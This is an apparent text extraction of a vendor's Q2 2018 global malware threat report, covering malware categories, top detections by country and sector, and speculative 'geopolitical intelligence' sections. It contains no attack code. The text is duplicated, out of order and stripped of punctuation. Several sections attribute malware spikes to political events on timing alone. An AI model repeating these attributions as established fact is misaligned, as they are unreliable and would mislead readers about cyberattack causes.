541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
